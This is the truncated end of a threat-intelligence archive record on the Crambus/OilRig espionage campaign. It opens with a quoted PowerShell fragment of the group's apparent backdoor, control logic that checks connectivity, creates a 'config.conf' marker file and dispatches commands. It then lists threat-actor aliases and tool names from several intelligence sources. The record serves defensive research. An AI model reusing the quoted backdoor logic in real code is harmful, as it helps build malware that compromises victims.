  
$false\r\n}\r\nfunction core\r\n{\r\n$global:flag= $true\r\n$value = verify\r\nif(-not[string]::IsNullOrEmpty($value))\r\n{\r\nif($value[0] -eq\"planA\")\r\n{\r\nmain $value[1]\r\n}\r\n}\r\n}\r\n$connect = connection\r\nif($connect -eq $true)\r\n{\r\nif($directory.Name -ne'config.conf')\r\n{\r\n$global:flag= $false\r\n$aliv = alive\r\nif($aliv -eq $true)\r\n{\r\ntry{New-Item -Path\"$($dir)\"   -ItemType File -Name\"config.conf\"   -ErrorAction\r\nStop;core}catch{}\r\n}\r\n}else{core}\r\n}else{exit}\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government"
	],
	"report_names": [
		"crambus-middle-east-government"
	],
	"threat_actors": [
		{
			"id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4",
			"created_at": "2022-10-25T15:50:23.458833Z",
			"updated_at": "2026-04-10T02:00:05.419537Z",
			"deleted_at": null,
			"main_name": "APT34",
			"aliases": null,
			"source_name": "MITRE:APT34",
			"tools": [
				"netstat",
				"Systeminfo",
				"PsExec",
				"SEASHARPEE",
				"Tasklist",
				"Mimikatz",
				"POWRUNER",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-10T02:00:05.258283Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b",
			"created_at": "2025-08-07T02:03:24.722093Z",
			"updated_at": "2026-04-10T02:00:03.681914Z",
			"deleted_at": null,
			"main_name": "COBALT EDGEWATER",
			"aliases": [
				"APT34 ",
				"Cold River ",
				"DNSpionage "
			],
			"source_name": "Secureworks:COBALT EDGEWATER",
			"tools": [
				"AgentDrable",
				"DNSpionage",
				"Karkoff",
				"MailDropper",
				"SideTwist",
				"TWOTONE"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-10T02:00:03.752071Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-10T02:00:02.999196Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Crambus",
				"Helix Kitten",
				"APT34",
				"IRN2",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Twisted Kitten",
				"Cobalt Gypsy",
				"APT 34",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"Earth Simnavaz"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-10T02:00:04.788408Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434313,
	"ts_updated_at": 1775826785,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cd1dcf4cafcbbfda661f8deb763e38a1905a714e.pdf",
		"text": "https://archive.orkl.eu/cd1dcf4cafcbbfda661f8deb763e38a1905a714e.txt",
		"img": "https://archive.orkl.eu/cd1dcf4cafcbbfda661f8deb763e38a1905a714e.jpg"
	}
}